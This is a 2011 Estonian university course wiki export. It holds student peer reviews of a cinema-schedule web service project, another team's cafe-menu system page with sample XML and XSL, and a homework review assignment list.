** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond "Tyhik"]]

Talk:Meeskond "Tyhik"

2011-06-06T08:18:43Z

Tliiv: /* Kokkuvõttev arvustus */

<pre>
Arvustus

Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis
<kinod>
<kino>
...
ning
<filmid>
<film>
...
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.
Lehe esialgne kujundus on hea, mulle meeldib.
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.

Indrek Tamm, meeskond Tool, 4.III.2011
</pre>

Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.

Siim Aaver, D21

Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.

Jaak Lehtsalu D22

XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.

Reigo Männiste D22

Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.

Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.

Jarko Kaskmaa D21

<pre>
Teenuse arvamus

Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele
saaks ehitada ühe korraliku ja kasuliku rakenduse.
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.
Aga samas, see on minu arvamus. Edu!

Taavi Ilves D21

----

Vastus:

Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte.
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks "true", siis pistetakse
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.

Aga täname arvamuse eest :)

Kert Suvi D22

</pre>

Teenuse arvustus

Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel "anna*" ja "võta*", kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku ''mergeda'', näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)

-Tanel Liiv D22

Teenuse arvustus

Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.

Siim Aaver D21

----

Vastus:

Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult "AnnaTeenus"-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.

Aga täname arvamuse eest :)

Kert Suvi D22

Teenuse arvustus

Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud "estenglish" kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.

Toomas Soha D21

==Arvustus veebiteenuse klientidele==

Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;)

Madis Sildaru D32

Esiteks ei ole projektil kaasas solution faili, VS ei oska sortsuga ilma selleta midagi peale hakata. Kuna loen faile Notepad++'sis siis, virisen peaasjalikult sortsu kallal :)
*Sorts on eesti keeles :/
*Int32.Parse(Request.QueryString["id"]); stiilis asjad peaks olema try-catch ploki sees.
* Üldse kogu see data komplekteerimine on väga mitte OOP: kisute ühe andmestruktuuri lahti ja lisati tema objektid kõik eraldi teistesse objektidesse ning siis söödate need objektid alles kuvamise loogikasse. Võiks ju kohe (nt. film.inimesed) Repeaterisse sööta.
*Kinokava.aspx.cs: treppimine on vale
*Response.Redirect("Kinokava.aspx?id=" + id + "&paev=" + paev + "&kuu=" + kuu + "&aasta=" + aasta); selline URI ehitamine võiks näiteks eraldi meetod olla juba, niimoodi on inetu.
*Kommentaarid puuduvad koodis.

Need olid peamised möödalaskmised mis silma hakkasid. Suures pildis on kena :)

Tanel Liiv D22

===Veebiteenuse arvustus===

Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.

Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):

Vähegi suurema projekti puhul ei kasutaks linq't, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks.
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).

Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte.
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.

PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga...
ei saa öelda, et ma just palju kommentaare oleks leidnud :)

Priit Siimo

===Veebiteenuse arvustus===

Teenuse aluseks olev andmebaas on lihtne ja hea. Vajalikud lisaseosed on loodud. Teenuse meetodite hulk on suur ning see on mõistetav, kui tegu on nii rohkelt infot nõudva valdkonna käsitlusega. Kood teenuses on kommenteeritud ja meetodid ise võimalikult erinevates klassides. Lihtne lugeda ja mõista, mis kus asub. Hästi tehtud.

Reigo Männiste D22

===Kokkuvõttev arvustus===

Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.

XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.

Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.

Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !

Rauno Rüga, D21

[[User:Rruga|Rruga]]

Kinokavade süsteem on väga huvitav valik. Wikis olev info maht on peaaegu sobiv - puudu jääb ehk vaid detailsemast süsteemiloogikast. Näiteks oleksin huvitatud lugemast täpsemalt kliendi andmevahetuse protokollist.

XML on üldiselt korralik, kuid wikis seisab punkt et süsteem toeta vaid ühte filmi, kas see on iganenud väide või on asi tõesti niimoodi? Mõlemad variandid ei ole eriti kiiduväärt. API on suures plaanis kena, küll aga ei meeldi see "võta" vs. "anna" nimede valik...API meetodite nimed peaks olema ikka nii iseenesestmõistetavad kui vähegi võimalik.

Meeskonnatöö tundub ka huvitav, punktide jaotus on kenasti lineaarne - hea et aus ollakse. Kuigi liikmeid oli piisavalt ei saadud siiski valmis teise klientrakendusega - võibolla sellepärast et punktide jaotusest tundub et arendajate arv oli projektis siiski väike ja nad lihtsalt ei jõudnud ise kõike valmis koodida.

Need aga on väikesed möödalaskmised, üldiselt on kiiduväärt projekt :)

PS! On tore näha et kasutati agiilseid arendusmeetodeid, eriti just paarisprogrammeerimist.

Tanel Liiv(D22)

Talk:Meeskond "Tyhik"

2011-06-06T07:56:20Z

Tliiv:

<pre>
Arvustus

Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis
<kinod>
<kino>
...
ning
<filmid>
<film>
...
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.
Lehe esialgne kujundus on hea, mulle meeldib.
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.

Indrek Tamm, meeskond Tool, 4.III.2011
</pre>

Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.

Siim Aaver, D21

Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.

Jaak Lehtsalu D22

XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.

Reigo Männiste D22

Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.

Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.

Jarko Kaskmaa D21

<pre>
Teenuse arvamus

Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele
saaks ehitada ühe korraliku ja kasuliku rakenduse.
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.
Aga samas, see on minu arvamus. Edu!

Taavi Ilves D21

----

Vastus:

Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte.
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks "true", siis pistetakse
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.

Aga täname arvamuse eest :)

Kert Suvi D22

</pre>

Teenuse arvustus

Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel "anna*" ja "võta*", kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku ''mergeda'', näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)

-Tanel Liiv D22

Teenuse arvustus

Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.

Siim Aaver D21

----

Vastus:

Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult "AnnaTeenus"-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.

Aga täname arvamuse eest :)

Kert Suvi D22

Teenuse arvustus

Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud "estenglish" kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.

Toomas Soha D21

==Arvustus veebiteenuse klientidele==

Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;)

Madis Sildaru D32

Esiteks ei ole projektil kaasas solution faili, VS ei oska sortsuga ilma selleta midagi peale hakata. Kuna loen faile Notepad++'sis siis, virisen peaasjalikult sortsu kallal :)
*Sorts on eesti keeles :/
*Int32.Parse(Request.QueryString["id"]); stiilis asjad peaks olema try-catch ploki sees.
* Üldse kogu see data komplekteerimine on väga mitte OOP: kisute ühe andmestruktuuri lahti ja lisati tema objektid kõik eraldi teistesse objektidesse ning siis söödate need objektid alles kuvamise loogikasse. Võiks ju kohe (nt. film.inimesed) Repeaterisse sööta.
*Kinokava.aspx.cs: treppimine on vale
*Response.Redirect("Kinokava.aspx?id=" + id + "&paev=" + paev + "&kuu=" + kuu + "&aasta=" + aasta); selline URI ehitamine võiks näiteks eraldi meetod olla juba, niimoodi on inetu.
*Kommentaarid puuduvad koodis.

Need olid peamised möödalaskmised mis silma hakkasid. Suures pildis on kena :)

Tanel Liiv D22

===Veebiteenuse arvustus===

Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.

Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):

Vähegi suurema projekti puhul ei kasutaks linq't, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks.
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).

Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte.
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.

PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga...
ei saa öelda, et ma just palju kommentaare oleks leidnud :)

Priit Siimo

===Veebiteenuse arvustus===

Teenuse aluseks olev andmebaas on lihtne ja hea. Vajalikud lisaseosed on loodud. Teenuse meetodite hulk on suur ning see on mõistetav, kui tegu on nii rohkelt infot nõudva valdkonna käsitlusega. Kood teenuses on kommenteeritud ja meetodid ise võimalikult erinevates klassides. Lihtne lugeda ja mõista, mis kus asub. Hästi tehtud.

Reigo Männiste D22

===Kokkuvõttev arvustus===

Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.

XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.

Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.

Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !

Rauno Rüga, D21

[[User:Rruga|Rruga]]

****
ARVUSTUS PLACEHOLDER
****
Tanel Liiv(D22)

Meeskond "Hungry Student Food Board"

2011-06-06T07:53:41Z

Tliiv: /* Meeskond */

==Repositooriumi aadress==
*http://svn3.xp-dev.com/svn/nomnom/HSFB/
*Versiooni haldus tarkvara - AnkhSVN või TurtoiseSVN

==Ülesande püstitus==

* XML fail
o XML fail, stiilifail ja skeemifail peavad olema valmis ja wikilehel kirjeldatud hiljemalt 27. veebruar 2011.
o Arvamused XML-failide kohta peavad tehtud olema 4. märts 2011

* Veebiteenus
o Veebiteenus peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.
o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011
o Veebiteenus tuleb esitleda!

* Klientrakendused
o Klientrakendused peavad olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.
o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011
o Klientrakendused tuleb esitleda!

* Meeskonna kokkuvõttev aruanne
o Meeskonnatöö kokkuvõttev aruanne peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 8.mai 2011
o Arvamused Meeskonnatöö kokkuvõtva aruande ja esitluse kohta tuleb esitada hiljemalt päev enne eksamit
o Meeskonna kokkuvõttev aruanne ja töö lõplik tulemus tuleb esitleda!

==Meeskond==
*Jaan Kruusma(14p) - projektijuht, analüüs
*Taavi Ilves(26p) - arendus, veebiteenus, facebook api
*Tanel Liiv(26p) - arendus, veebiteenus
*Indrek Kruuser(14p) - arendus, klientrakendus

'''Punktid jagatakse võrdselt'''

==Idee==
Idee on luua kohviku menüü haldamise tarkvara. Kasutajal ehk kohvikul on võimalus interneti teel kirjeldada müüki minevad tooted ning tooteid kuvatakse kohvikutes LCD display pealt kui ka Facebooki kaudu kõikide kohvikute menüüsi jälgida. Me lähtume KISS põhimõttest ja hoiame info võimalikult konkreetsena, et kasutaja ei peaks pool päeva toite sisestama või pidevalt kogust arvestama.

==Planeering==
* Veebiteenuse ehitame IronPythoniga .Net frameworki peale.
* Arenduskeskond on Visual Studio 2010, millel on IronPython liides.
* Andmebaasina kasutame MySQL'i, see on kiire ja lihtne üles seada.
* Kliendipoolse lahenduse teeme Asp.Net'i aines kõrval projektina.
* Kõik mis kuvatakse kasutajale ehk kohviku kylastajale teeme HTMLi ja JavaScriptiga
* Andmemudeli diagrammi koostame programmiga QSEE Superlite.

==Veebiteenus==
*IronPythoni kasutus osutus vaevaliseks, asendasime selle C sharpiga.
**MVC3 raamistik
**Razor view engine mugavamaks kirjutamiseks
**MSSQL 2008 R2 andmebaasi mootoriks
**Andmete vahekiht LINQ To Entities

*Tagastab kohviku menüü veebiteenuse ID järgi
*Klienditeenus genereerib igale kohvikule ID
*auth meetod
**tuvastatkse kasutaja
**päring kohviku andmetele

*api meetod
**auth vastusest kuvab kohviku menüü
**Päeva menüü xml kujul

*Statistika korjamine
**Kohviku, meetodi ning IP põhine
***Võimaldab näha statistikat kasutaja ja kohviku lõikes
***Võimaldab näha koormust meetodi põhiselt
**Minimaalne täpsus üks tund
***Et andmemahud ei kasvaks üle pea
***Et oleks võimalik koormust hinnata kellaajaliselt
*[[File:HSFBstats.png]]

===Toodete kuvamine===
[[File:HSFBVeebiteenus.png]]

==Andmediagramm==

[[File:HSFB.png]]

==Desktop Rakendus==
*Töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4
[[File:HFt66.png]]

==Facebook Api==
*Toitude hääletamine reaalajas
[[File:HSFBapi.jpg]]

== XML Fail ==
Highlighted: http://sprunge.us/DPIe?xml

<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet type="text/xsl" href="default.xsl"?>
<kohvikud xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="kohvikud.xsd">
<kohvik name="IT KOHVIK" staatus="Nummisi pannkooke saadaval">
<toit tyyp="praad">
<pilt>
<url width="100" height="100">http://www.neti.ee/pilt.jpg</url>
</pilt>
<pealkiri>kanapraad</pealkiri>
<kirjeldus>sinihallitus sokiga</kirjeldus>
<poolhind valuuta="eur" rate="1.0000">100</poolhind>
<tervehind valuuta="eur" rate="1.0000">200</tervehind>
<allahindlus>50%</allahindlus>
<kehtib>31.03.2011</kehtib>
<liked>34</liked>
</toit>
<toit tyyp="supp">
<pilt>
<url width="100" height="100">http://www.neti.ee/pilt2.jpg</url>
</pilt>
<pealkiri>õunasupp</pealkiri>
<kirjeldus>koorega</kirjeldus>
<poolhind valuuta="eur" rate="1.0000">50</poolhind>
<tervehind valuuta="eur" rate="1.0000">120</tervehind>
<allahindlus>10%</allahindlus>
<kehtib>31.03.2011</kehtib>
<liked>33</liked>
</toit>
</kohvik>
<kohvik name="TTY KOHVIK" staatus="Parim koht">
<toit tyyp="praad">
<pilt>
<url width="100" height="100">http://www.neti.ee/pilt2.jpg</url>
</pilt>
<pealkiri>seapraad</pealkiri>
<kirjeldus>seentega</kirjeldus>
<poolhind valuuta="eur" rate="1.0000">200</poolhind>
<tervehind valuuta="eur" rate="1.0000">420</tervehind>
<allahindlus>10%</allahindlus>
<kehtib>31.03.2011</kehtib>
<liked>2</liked>
</toit>
</kohvik>
</kohvikud>

== XSL ==

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">
<html>
<body>
<h2>Kohvikud</h2>
<table border="1">
<tr bgcolor="#9acd32">
<th>Nimi</th>
<th>Staatus</th>
<th>Menüü</th>
</tr>
<xsl:for-each select="kohvikud/kohvik">
<tr>
<td valign="top"><xsl:value-of select="@name"/></td>
<td valign="top"><xsl:value-of select="@staatus"/></td>
<td valign="top">
<table border="1">
<tr bgcolor="#2acd32">
<td>Pealkiri</td>
<td>Väike portsjon</td>
<td>Täis portsjon</td>
<td>Soodustus</td>
<td>Kehtib</td>
<td>Kirjeldus</td>
<td>Laike</td>
<td>Pildid</td>
</tr>
<xsl:for-each select="./toit">
<tr>
<td><xsl:value-of select="pealkiri"/></td>
<td><xsl:value-of select="poolhind"/></td>
<td><xsl:value-of select="tervehind"/></td>
<td><xsl:value-of select="allahindlus"/></td>
<td><xsl:value-of select="kehtib"/></td>
<td><xsl:value-of select="kirjeldus"/></td>
<td><xsl:value-of select="liked"/></td>
<td>
<xsl:for-each select="./pilt">
<xsl:value-of select="url"/>
</xsl:for-each>
</td>
</tr>
</xsl:for-each>
</table>
</td>
</tr>
</xsl:for-each>
</table>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

== ASP.Net aine raames adminni sisuhaldus ==

'''Nagu eelpool mainitud, kasutame MVC3 raamistikku, andmeid liigutab LINQ to entities.'''

'''Kasutajal tuleb autentida, selleks on aspi enda membership lahendus.'''

[[File:HFSB_login.png]]

'''Menüüde halduse esileht'''

[[File:HFSB_front.png]]

'''Kohvikute vaade, üldadmin näeb kõiki kohvikuid, tavaadmin ainult temaga seostatud kohvikuid'''

[[File:HFSB_cafes_front.png]]

'''Igal kohvikul on enda tooted..'''

[[File:HFSB_tooted_front.png]]

'''..mille sisestamine näeb välja selline:'''

[[File:HFSB_edit_product.png]]

'''Tooteid saab luua, kustutada ja välja lülitada (viimane toimub ajaxiga).

Tootel on küljes kehtivus kuupäev, vastavalt millele genereeritakse menüü. Menüüs on iga päeva peal toode, mis sel päeval kehtib.
'''

[[File:HFSB_menufilter.png]]

== Logi ==
=== 16. Mai ===
Finaalesitlus

=== 13. Mai ===
Ebaõnne päev ja lõpusirge arendus!

=== 6. Mai ===
Desktopvaate analüüs
töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4

=== 29. Aprill ===
Veebiteenuse parendamine

=== 22. Aprill ===
Konkurendiga koostöö lepingu sõlmimine, koodivahetus.

=== 18. Aprill ===
Teenuse presentatsioon, karm tagasiside ehk esimese testimis tulemuste analüüs ja iteratiivse arenguga jätkamine

=== 15-17. Aprill ===
Veebiteenuse lõpu sprint
Andmebaasi lisatud tabel, mis korjab statistikat

=== 8. Aprill ===
Arendus Sprint
*määramatusest tulenevad probleemid
*vaate toorik
*versiooni halduse

=== 4. Aprill ===
Alamprojekt baasitäitmiseks

=== 18. Märts ===
Andmebaasi lihvimine, teenuse toorik.
Projektijuht 2 nädalat komandeeringus, arenduse koordinaator sinisel lehel.

=== 15. Märts ===
Töötav andmebaas, metsikud vaevad versioonihaldusega.
=== 7. Märts ===
Rühmatöö ettevalmistused ja ümberkorraldused: MVC3 (Razor view engine) ja MSSQL SERVER 2008 R2 asendamine. Versioonihalduseks Mercurial HG.
=== 1. Märts ===
Andmediagrammi esialgsed kavandid, et sobiks xmliga kokku.

=== 23. Veebruar ===
Tekkisid määramatusest tulenevad probleemid, haigestumine ja riigipühad.
Xml ja Xsl valmis, Schema vajab täiendusi.

=== 17. Veebruar ===
Projekti kavand pandi paika ja jaotati esialgsed töö ülesanded.
Esialgse Xml'i draft, endiselt arenduses.

=== 16. Veebruar ===
Drastilised muudatused arendus tööriistade valikul. Põhi osa programmist luuakse Pythoniga .NET raamistikus, aga kliendi liides tehakse ikkagi asp.net'iga.

=== 14. Veebruar ===
Meeskonna nime valik ja wiki lehe alustamine.

=== 7. Veebruar ===
Arendus vahenditega tutvumine, kuidas teha, mida teha. Palju metadata kogumist.

=== 2. Veebruar ===
Uue meeskonna moodustamine ja idee kujunemine

[[Category: Võrgurakendused II: hajussüsteemide ehitamine]]
[[Category: Veebirakenduste loomine ASP.NET abil]]

Võrgurakendused II: 2011 kevadel valminud kodutööd

2011-06-05T21:29:06Z

Tliiv: /* Tanel Liiv */

=Jaan Igamees=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Kert Suvi=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond Tool]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Helen Muidik=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenusele [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Tact"]]
** Arvustus projektile kokkuvõtvalt

=Mihkel Sokk=
* Meeskond [[Meeskond "Tact"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Sepad"]]
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Sepad"]]
** Arvustus projektile kokkuvõtvalt

=Seda Sahradyan=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tact"]]
** Arvustus veebiteenusele [[Talk:Meeskond "GAP"]]
